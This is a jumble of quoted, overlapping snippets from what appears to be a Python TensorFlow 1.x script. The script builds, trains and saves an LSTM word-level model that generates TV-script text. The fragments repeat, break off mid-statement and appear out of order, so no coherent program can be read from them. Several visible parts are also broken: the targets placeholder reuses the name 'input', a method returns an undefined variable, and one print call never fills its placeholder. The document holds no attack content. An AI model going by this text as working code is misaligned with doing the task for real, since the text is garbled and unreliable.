"- total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {}, estimated to",
"batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state =",
"probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1],",
"epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess,",
"key in ['\\n', '(', '\"'] else '' tv_script = tv_script.replace(' ' + token.lower(),",
"[test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove",
"input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients =",
"epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory =",
"return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities)",
"num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i % test_every ==",
"from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None],",
"name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size,",
"tv_script = tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n') tv_script",
"full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and",
"(epoch_i % test_every == 0 or epoch_i == num_epochs - 1): test_final_state, test_probs",
"= '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved",
"= '3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32,",
"tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self,",
"generating words probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits,",
"batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed = { self.input_text: x, self.targets:",
"outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state)",
"prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state",
"get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data)",
"tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self, cell,",
"self.initial_state: state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran",
"x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state,",
"tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time",
"function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer",
"self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients",
"p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2):",
"def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number):",
"Remove tokens tv_script = ' '.join(gen_sentences) for key, token in token_dict.items(): ending =",
"enumerate(batches): feed = { self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss,",
"vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state",
"== num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i % test_every",
"test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations())",
"finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every",
"learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i)",
"np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def",
"build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state =",
"words probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits, self.targets,",
"self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op],",
"vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self,",
"if key in ['\\n', '(', '\"'] else '' tv_script = tv_script.replace(' ' +",
"logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating words probs",
"last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i",
"time so far {}, estimated to finish {}' .format(epoch_i + 1, num_epochs, train_loss,",
"units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir):",
"seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) #",
"self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i % test_every == 0 or epoch_i",
"final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def",
"datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch",
"train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number)",
"1.0), var) for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all()",
"tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost)",
"self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state =",
"if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def",
"- all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i +",
"basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\")",
"{self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for",
"= self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size,",
"prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences)",
"= tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ', '(') return tv_script def get_tensors(self,",
"last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish =",
"Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word =",
"/ (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so",
"_ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries,",
"= tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding",
"layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size,",
"1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab,",
"datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import",
"+ ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic",
"token in token_dict.items(): ending = ' ' if key in ['\\n', '(', '\"']",
"epoch_i + 1) if (epoch_i % test_every == 0 or epoch_i == num_epochs",
"for generating words probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss(",
"len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0],",
"embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs):",
"return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir,",
"optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0,",
"import tensorflow as tf import timeit import datetime import numpy as np import",
"'\\n') tv_script = tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor =",
"tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor =",
"embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self,",
"# Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state})",
"epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i %",
"1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i % test_every == 0 or",
"seq_length): print('Generating new text with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences",
"embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn,",
"self.input_text, vocab_size) # Probabilities for generating words probs = tf.nn.softmax(logits, name='probs') # Loss",
"int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences) for key, token in",
"ending = ' ' if key in ['\\n', '(', '\"'] else '' tv_script",
"input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected",
"test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])})",
"sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer()",
"graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir,",
"{}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state,",
"Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var",
"{self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed = { self.input_text: x,",
"far {}, estimated to finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish))",
"with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':']",
"rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating",
"0 or epoch_i == num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script =",
"tv_script = tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ', '(') return tv_script def",
"self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i):",
"text with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word +",
"test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess,",
"and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess,",
"in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run( [test_probs,",
"= tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size,",
"self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i)",
"# Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients =",
"n in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]]",
"save_every == 0 or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i +",
"def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding,",
"= tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self,",
"' + token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ',",
"token_dict.items(): ending = ' ' if key in ['\\n', '(', '\"'] else ''",
"== 0 or epoch_i == num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script",
"trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab,",
"= tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size,",
"+ token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ', '(')",
"1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0 or epoch_i",
"train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs):",
"sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far",
"Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad,",
"cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size)",
"all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1)",
"epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in",
"{}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every ==",
"tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor)",
"[None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self,",
"= tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]]))",
"{self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script",
"print('Generating new text with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences =",
"loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from =",
"all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for",
"self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None)",
"Dynamic Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) #",
"initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = '",
"input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell,",
"# Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for",
"self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def",
"self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) #",
"dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text:",
"tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding =",
"Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word",
"to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir,",
"Probabilities for generating words probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost =",
"to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length):",
"gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences) for key, token in token_dict.items():",
"timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x,",
"self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}',",
"# Probabilities for generating words probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost",
"= optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches,",
"loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities,",
"(epoch_i % save_every == 0 or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir,",
"def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size =",
"return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell",
"cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell,",
"return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor,",
"#print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i",
"None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size,",
"(epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so far",
"= tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model",
"gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in",
"to finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i %",
"os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word,",
"= self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating words probs = tf.nn.softmax(logits,",
"range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed",
"state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary =",
"= tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs,",
"(multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1))",
"'.join(gen_sentences) for key, token in token_dict.items(): ending = ' ' if key in",
"= self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state)",
"NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None,",
"= tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0),",
"test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text:",
"num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess:",
"tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text,",
"prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic Input dyn_input",
"= ' ' if key in ['\\n', '(', '\"'] else '' tv_script =",
"key, token in token_dict.items(): ending = ' ' if key in ['\\n', '(',",
"estimated to finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i",
"if (epoch_i % test_every == 0 or epoch_i == num_epochs - 1): test_final_state,",
"as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class NeuralNetwork():",
"seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets =",
"for batch_i, (x, y) in enumerate(batches): feed = { self.input_text: x, self.targets: y,",
"tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\")",
"train_loss = {:.3f}, time so far {}, estimated to finish {}' .format(epoch_i +",
"os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input =",
"for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y)",
"= self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict, seq_length)",
"* layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data,",
"input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def",
"multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state)",
"epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish",
"p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm]",
"tv_script = ' '.join(gen_sentences) for key, token in token_dict.items(): ending = ' '",
"-1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell,",
"[[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state",
"embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state =",
"datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss =",
"# Remove tokens tv_script = ' '.join(gen_sentences) for key, token in token_dict.items(): ending",
"gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text with prime word: {}'.format(prime_word))",
"name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost)",
"get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\")",
"timeit import datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from",
"'' tv_script = tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n')",
"loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from,",
"= sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic Input dyn_input =",
"= { self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _",
"y) in enumerate(batches): feed = { self.input_text: x, self.targets: y, self.initial_state: state, self.lr:",
"prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text with",
"= tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate =",
"word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run(",
